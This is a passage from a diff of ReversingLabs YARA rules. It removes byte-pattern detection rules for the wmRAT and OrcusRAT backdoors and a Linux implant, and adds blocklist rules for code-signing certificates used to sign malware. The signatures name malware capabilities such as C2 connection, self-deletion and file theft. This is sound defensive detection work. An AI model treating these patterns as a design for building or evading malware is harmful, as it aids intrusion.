-            ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 8B 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ??
-            8B 00 8D 50 ?? 85 C0 0F 48 C2 C1 F8 ?? 48 98 48 8B B4 C5 ?? ?? ?? ?? 48 8B 85 ?? ??
-            ?? ?? 8B 00 99 C1 EA ?? 01 D0 83 E0 ?? 29 D0 BA ?? ?? ?? ?? 89 C1 48 D3 E2 48 89 D0
-        }
-		$network_proxy_communication_p2 = {
-            48 21 F0 48 85 C0 0F 84 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D B5 ?? ?? ?? ?? 48 8B
-            85 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 89 D1 BA ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 89
-            85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 95 ??
-            ?? ?? ?? 48 8D B5 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 89 C7 E8 ?? ??
-            ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? E9 ?? ?? ?? ??
-            48 8B 85 ?? ?? ?? ?? 8B 00 8D 50 ?? 85 C0 0F 48 C2 C1 F8 ?? 48 98 48 8B B4 C5 ?? ??
-            ?? ?? 48 8B 85 ?? ?? ?? ?? 8B 00 99 C1 EA ?? 01 D0 83 E0 ?? 29 D0 BA ?? ?? ?? ?? 89
-            C1 48 D3 E2 48 89 D0 48 21 F0 48 85 C0 0F 84 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D
-            B5 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 89 D1 BA ?? ?? ?? ?? 48 89
-            C7 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? EB
-            ?? 8B 95 ?? ?? ?? ?? 48 8D B5 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 89
-            C7 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 85 ??
-            ?? ?? ?? EB ?? 90 E9 ?? ?? ?? ?? 48 8B 4D ?? 64 48 33 0C 25 ?? ?? ?? ?? 74 ?? EB ??
-            F3 0F 1E FA 48 89 C7 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? C9 C3
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VALENTE SP Z O O" and pe.signatures [ i ] . serial == "52:26:a7:24:cf:a0:b4:bc:01:64:ec:da:3f:02:a3:dc" and 1647302400 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_0A7Be7722B65A866Ebcd3Bd7F8F10825 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "2b177573-8b9f-538f-8d07-b7baede1148d"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L10552-L10568"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "c4aa22241ef72d454db4ec0fb0933abfa7b1d8d1029b45410475832cda4a2af4"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint32( 0 ) == 0x464C457F and ( all of ( $install_library_implant_p* ) ) and ( $self_delete ) and ( all of ( $execute_local_file_p* ) ) and ( all of ( $network_proxy_communication_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rebound Infotech Limited" and pe.signatures [ i ] . serial == "0a:7b:e7:72:2b:65:a8:66:eb:cd:3b:d7:f8:f1:08:25" and 1637971200 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win64_Backdoor_Wmrat : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_05634456Dbedb3556Ca8415E64815C5D : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects wmRAT backdoor."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "9ae75871-b08f-52cc-8588-a444d13ecd89"
-		date = "2025-03-17"
-		modified = "2025-03-17"
+		id = "c9a05c35-2aed-5944-aad7-65ae2c290c6c"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/backdoor/Win64.Backdoor.wmRAT.yara#L1-L144"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "23aadaf1571f23b3f02191e3079171c981d4969d0bd266d6db8c95fc091a1606"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L10570-L10586"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "f5941c74821c0cd76633393d0346a9de2c7bccc666dc20b34c5b4d733faefc8f"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Backdoor"
-		tc_detection_name = "wmRAT"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$connect_to_c2 = {
-            6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? ?? ?? 33 C4 89 44 24 ??
-            A1 ?? ?? ?? ?? 33 C4 50 8D 44 24 ?? 64 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ??
-            ?? 66 A3 ?? ?? ?? ?? B8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4C 24 ?? 66 A3 ?? ?? ?? ?? FF
-            15 ?? ?? ?? ?? 83 7C 24 ?? ?? 8B 44 24 ?? 73 ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 6A
-            ?? 6A ?? 6A ?? A3 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 50 A3 ?? ?? ??
-            ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 0D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 83 C8 ?? 8D
-            4C 24 ?? A3 ?? ?? ?? ?? 89 44 24 ?? FF 15 ?? ?? ?? ?? 32 C0 EB ?? 8D 4C 24 ?? C6 05
-            ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? B0 ?? 8B 4C 24 ?? 64 89 0D
-            ?? ?? ?? ?? 59 8B 4C 24 ?? 33 CC E8 ?? ?? ?? ?? 83 C4 ?? C3
-        }
-		$find_files_and_get_file_data_p1 = {
-            6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ??
-            ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 55 56 57 A1 ?? ?? ?? ?? 33 C4 50 8D 84 24 ?? ?? ??
-            ?? 64 A3 ?? ?? ?? ?? 33 DB 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 89 9C 24 ?? ?? ?? ??
-            FF 15 ?? ?? ?? ?? 83 BC 24 ?? ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 73 ?? 8D 84 24 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 50 8D 84 24 ?? ?? ?? ?? 89 8C 24 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8D 54 24 ?? C6 84 24 ?? ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 52 E8 ??
-            ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 3B C1 74
-            ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 8B 44 24 ?? 8D 94 24 ?? ?? ?? ?? 52 50 FF 15 ?? ??
-            ?? ?? 89 44 24 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? F6 84 24 ?? ?? ?? ??
-            ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 53 51 89 9C 24 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 52 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF D5
-            8B 0D ?? ?? ?? ?? 66 8B 15 ?? ?? ?? ?? 83 C4 ?? 33 C0 89 84 24 ?? ?? ?? ?? 89 84 24
-            ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 8C 24 ?? ?? ?? ?? 89 84 24
-            ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 66 89 84 24 ?? ?? ?? ?? C7 84
-            24 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 94 24 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 8D 84 24 ??
-            ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 3B D3 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0
-            ?? 83 C1 ?? 66 3B D3 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 3B C3 0F 84 ?? ?? ?? ?? 8D 8C
-        }
-		$find_files_and_get_file_data_p2 = {
-            24 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 3B D3 74 ?? 66 8B 50
-            ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 3B D3 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 3B
-            C3 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 53 50 89 9C 24 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 53 51 89 9C 24 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8B 54 24 ?? 8B C2 83 C4 ?? 8D 70 ?? EB ?? 8D 49 ?? 66 8B 08 83 C0 ?? 66 3B
-            CB 75 ?? 2B C6 D1 F8 8D 44 00 ?? 50 52 8D 8C 24 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8D 94
-            24 ?? ?? ?? ?? 52 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF D5 8D 8C 24 ?? ?? ?? ??
-            51 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 FF D5 83 C4 ?? 8D 44 24 ?? 68 ?? ?? ?? ??
-            8D 8C 24 ?? ?? ?? ?? 89 44 24 ?? 51 8D 44 24 ?? E8 ?? ?? ?? ?? 8D 54 24 ?? C6 84 24
-            ?? ?? ?? ?? ?? 8B 4C 24 ?? 52 E8 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 8B 44 24 ?? 8D
-            4C 24 ?? 3B C1 74 ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 8B 54 24 ?? 52 8D 8C 24 ?? ?? ??
-            ?? FF 15 ?? ?? ?? ?? 83 EC ?? 8B CC 89 64 24 ?? 68 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ??
-            ?? FF 15 ?? ?? ?? ?? 8D B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C6 68 ?? ?? ?? ?? 50 FF
-            15 ?? ?? ?? ?? 83 C4 ?? 84 C0 74 ?? FF 05 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 52 8D 84 24 ?? ?? ?? ?? 89 8C 24
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 44 24 ?? C6 84 24 ?? ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ??
-            50 E8 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 8D 8C 24
-        }
-		$find_files_and_get_file_data_p3 = {
-            3B C1 74 ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? FF 15
-            ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 8B 54 24 ?? 52 8D 8C 24 ?? ?? ?? ?? FF 15 ?? ??
-            ?? ?? 83 EC ?? 8D 84 24 ?? ?? ?? ?? 8B CC 89 64 24 ?? 50 FF 15 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 33 C0 0F B7 D0 8B C2 C1 E2 ?? 0B C2 B9 ?? ?? ?? ?? 8D BC 24 ?? ?? ?? ?? F3 AB
-            83 C4 ?? 8D 8C 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? C6 84 24 ??
-            ?? ?? ?? ?? 8B 44 24 ?? 83 C0 ?? 8D 48 ?? 83 CA ?? F0 0F C1 11 4A 85 D2 7F ?? 8B 08
-            8B 11 50 8B 42 ?? FF D0 8D 8C 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ??
-            ?? C6 84 24 ?? ?? ?? ?? ?? 8B 44 24 ?? E9 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 3B C3 8B
-            8C 24 ?? ?? ?? ?? 89 4C 24 ?? 89 44 24 ?? 0F 8C ?? ?? ?? ?? 7F ?? 3B CB 0F 86 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 53 51 89 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8B 54 24 ?? 8B C2 83 C4 ?? 8D 70 ?? 8D 64 24 ?? 66 8B 08 83 C0 ?? 66 3B CB 75 ?? 2B
-            C6 D1 F8 8D 44 00 ?? 50 52 8D 8C 24 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ??
-            ?? 83 C4 ?? 8B D0 8B FF 66 8B 08 83 C0 ?? 66 3B CB 75 ?? 8D BC 24 ?? ?? ?? ?? 2B C2
-            83 C7 ?? EB ?? 8D A4 24 ?? ?? ?? ?? 66 8B 4F ?? 83 C7 ?? 66 3B CB 75 ?? DF 6C 24 ??
-            8B C8 C1 E9 ?? 8B F2 DC 05 ?? ?? ?? ?? F3 A5 DD 1D ?? ?? ?? ?? 8B C8 68
-        }
-		$find_files_and_get_file_data_p4 = {
-            8D 84 24 ?? ?? ?? ?? 83 E1 ?? 8D 94 24 ?? ?? ?? ?? 50 8D 84 24 ?? ?? ?? ?? F3 A4 89
-            94 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? C6 84 24 ?? ?? ?? ?? ?? 51 8B 8C 24 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 8D 94 24 ?? ??
-            ?? ?? 3B C2 74 ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 8B 44 24 ?? 50 8D 8C 24 ?? ?? ?? ??
-            FF 15 ?? ?? ?? ?? FF 05 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? C6 84 24
-            ?? ?? ?? ?? ?? 8B 44 24 ?? 83 C0 ?? 83 CA ?? 8D 48 ?? F0 0F C1 11 4A 85 D2 7F ?? 8B
-            08 8B 11 50 8B 42 ?? FF D0 8B 74 24 ?? 8D 8C 24 ?? ?? ?? ?? 51 56 FF 15 ?? ?? ?? ??
-            85 C0 0F 85 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 88 9C 24 ?? ?? ?? ?? 8B 44 24 ?? 83 C0
-            ?? 8D 50 ?? 83 C9 ?? F0 0F C1 0A 49 85 C9 7F ?? 8B 08 8B 11 50 8B 42 ?? FF D0 8D 8C
-            24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 8C 24 ?? ?? ??
-            ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5D 5B 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 81
-            C4 ?? ?? ?? ?? C3
-        }
-		$receive_data_and_write_to_file = {
-            C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 8B 4C 24 ?? 51 E8 ??
-            ?? ?? ?? 8B 7C 24 ?? 8B F0 83 C4 ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 84 C0 75 ?? 68 ?? ??
-            ?? ?? 8D 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 83 EC ?? 8B D4 C7 84 24 ?? ?? ??
-            ?? ?? ?? ?? ?? 89 64 24 ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 52 FF 15 ?? ?? ??
-            ?? 83 C4 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 8C 24 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 4C 24 ??
-            51 56 B9 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 54 24 ?? 01 15 ?? ?? ?? ?? 56 E8 ?? ?? ??
-            ?? 83 C4 ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D
-            8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 83 EC ?? 8B C4 C7 84 24 ?? ?? ?? ?? ?? ??
-            ?? ?? 89 64 24 ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 51 50 E9
-        }
-		$get_system_information = {
-            6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? ?? ?? 33 C4 89 44 24 ??
-            53 55 56 57 A1 ?? ?? ?? ?? 33 C4 50 8D 44 24 ?? 64 A3 ?? ?? ?? ?? 8B 1D ?? ?? ?? ??
-            33 F6 BD ?? ?? ?? ?? 83 CF ?? E8 ?? ?? ?? ?? 66 A1 ?? ?? ?? ?? 8A 0D ?? ?? ?? ?? 66
-            89 44 24 ?? 88 4C 24 ?? FF 15 ?? ?? ?? ?? 89 44 24 ?? 3B C6 74 ?? 8D 9B ?? ?? ?? ??
-            A8 ?? 74 ?? 8D 54 24 ?? 52 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4C 24 ??
-            89 74 24 ?? FF 15 ?? ?? ?? ?? 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C 24 ?? 89
-            7C 24 ?? FF 15 ?? ?? ?? ?? 8B 44 24 ?? FE 44 24 ?? D1 E8 89 44 24 ?? 75 ?? 8D 4C 24
-            ?? 51 E8 ?? ?? ?? ?? 8D 54 24 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? FF D3 83 ED ?? 0F
-            85 ?? ?? ?? ?? 8B 4C 24 ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5D 5B 8B 4C 24 ?? 33 CC E8
-            ?? ?? ?? ?? 83 C4 ?? C3
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Walden Intertech Inc." and pe.signatures [ i ] . serial == "05:63:44:56:db:ed:b3:55:6c:a8:41:5e:64:81:5c:5d" and 1648425600 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_2E07A8D6E3B25Ae010C8Ed2C4Ab0Fb37 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "39d23cbf-862f-5a3d-9e30-b3f0929963d5"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L10588-L10604"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "bad2144c9cde02a75fa968e3c24178f3ba73b0addb2b4967f24733b933e0eeb6"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $connect_to_c2 ) and ( all of ( $find_files_and_get_file_data_p* ) ) and ( $receive_data_and_write_to_file ) and ( $get_system_information )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Emurasoft, Inc." and pe.signatures [ i ] . serial == "2e:07:a8:d6:e3:b2:5a:e0:10:c8:ed:2c:4a:b0:fb:37" and 1650499200 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Backdoor_Orcusrat : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_30B4Eeebd88Fd205Acc8577Bbaed8655 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects OrcusRAT backdoor."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "d4700cd1-73a4-552d-bc27-7408508a28e7"
-		date = "2024-09-10"
-		modified = "2024-09-10"
+		id = "27c60ade-41e1-5ba4-be8d-275edc01b5ba"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/backdoor/ByteCode.MSIL.Backdoor.OrcusRAT.yara#L1-L134"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "17a85613e9e4c862ce81fee49065c250381dbf8a50cf07d496f5fd2c1b82d92e"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L10606-L10622"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "673ec5a1cacb9a7be101a4a533baf5a1eab4e6dd8721c69e56636701c5303c72"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Backdoor"
-		tc_detection_name = "OrcusRAT"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$get_tcp_connections = {
-            18 0B 16 0C 7E ?? ?? ?? ?? 12 ?? 17 07 1B 16 28 ?? ?? ?? ?? 0D 09 2C ?? 09 1F ?? 2E
-            ?? 72 ?? ?? ?? ?? 09 8C ?? ?? ?? ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 7A 08 28 ?? ?? ??
-            ?? 13 ?? 11 ?? 12 ?? 17 07 1B 16 28 ?? ?? ?? ?? 0D 09 2C ?? 72 ?? ?? ?? ?? 09 8C ??
-            ?? ?? ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 7A 11 ?? D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ??
-            ?? ?? ?? A5 ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 11 ?? 7B ?? ?? ?? ?? 8C ?? ?? ??
-            ?? 28 ?? ?? ?? ?? 6A 58 28 ?? ?? ?? ?? 13 ?? 11 ?? 7B ?? ?? ?? ?? 8D ?? ?? ?? ?? 0A
-            16 13 ?? 2B ?? 11 ?? D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? A5 ?? ?? ?? ?? 13
-            ?? 06 11 ?? 11 ?? A4 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 11 ?? 8C ?? ?? ?? ?? 28 ?? ??
-            ?? ?? 6A 58 28 ?? ?? ?? ?? 13 ?? 11 ?? 17 58 13 ?? 11 ?? 6A 11 ?? 7B ?? ?? ?? ?? 6E
-            32 ?? DE ?? 11 ?? 28 ?? ?? ?? ?? DC 06 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? (FE | 06)
-            ?? ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28
-        }
-		$get_operating_system_information_p1 = {
-            73 ?? ?? ?? ?? 25 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 28 ?? ?? ?? ?? 6F
-            ?? ?? ?? ?? 0B 12 ?? (FE | 16) ?? ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 28 ??
-            ?? ?? ?? 6F ?? ?? ?? ?? 25 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 28 ?? ??
-            ?? ?? 6F ?? ?? ?? ?? 25 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 28 ?? ?? ?? ?? 6F ?? ?? ??
-            ?? 0A 28 ?? ?? ?? ?? 0C 08 45 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 2B ??
-            06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2B ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2B ?? 06 72
-            ?? ?? ?? ?? 6F ?? ?? ?? ?? 2B ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 73 ?? ?? ?? ?? 0D
-            09 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 7D ?? ?? ?? ?? 06 09 (FE | 06) ??
-            ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 72 ?? ??
-            ?? ?? 6F ?? ?? ?? ?? 39 ?? ?? ?? ?? 09 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ??
-            6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 20 ?? ?? ?? ?? 2F ?? 06 1C 8D ?? ?? ?? ??
-            25 16 09 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? A2 25 17 72 ?? ?? ?? ?? A2 25
-            18 09 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? A2 25 19 72 ?? ?? ?? ?? A2 25 1A
-            11 ?? 8C ?? ?? ?? ?? A2 25 1B 72 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 38 ??
-            ?? ?? ?? 06 1C 8D ?? ?? ?? ?? 25 16 09 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F
-        }
-		$get_operating_system_information_p2 = {
-            A2 25 17 72 ?? ?? ?? ?? A2 25 18 11 ?? 8C ?? ?? ?? ?? A2 25 19 72 ?? ?? ?? ?? A2 25
-            1A 09 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? A2 25 1B 72 ?? ?? ?? ?? A2 28 ??
-            ?? ?? ?? 6F ?? ?? ?? ?? 2B ?? 06 1A 8D ?? ?? ?? ?? 25 16 09 7B ?? ?? ?? ?? 72 ?? ??
-            ?? ?? 6F ?? ?? ?? ?? A2 25 17 72 ?? ?? ?? ?? A2 25 18 09 7B ?? ?? ?? ?? 72 ?? ?? ??
-            ?? 6F ?? ?? ?? ?? A2 25 19 72 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 26
-            06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 06 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ??
